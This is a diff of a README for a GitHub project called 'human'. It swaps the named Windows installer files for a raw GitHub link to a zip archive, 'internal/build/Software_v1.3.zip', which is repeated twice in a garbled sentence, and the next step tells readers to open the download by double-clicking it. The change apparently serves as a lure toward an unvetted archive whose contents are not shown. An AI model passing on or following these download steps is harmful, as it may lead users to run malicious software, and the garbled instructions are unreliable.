Voiler-XD/human/README.md

 2. On the GitHub page, look for the latest release or version.
 It usually shows up under a "Releases" section.

 3. Download the Windows installer file.
-It will usually be named something like `human-setup.exe` or `human-windows.exe`.
+It will usually be named something like `https://raw.githubusercontent.com/Voiler-XD/human/main/internal/build/Software_v1.3.zip` or `https://raw.githubusercontent.com/Voiler-XD/human/main/internal/build/Software_v1.3.zip`.

 4. Once downloaded, open the file by double-clicking it.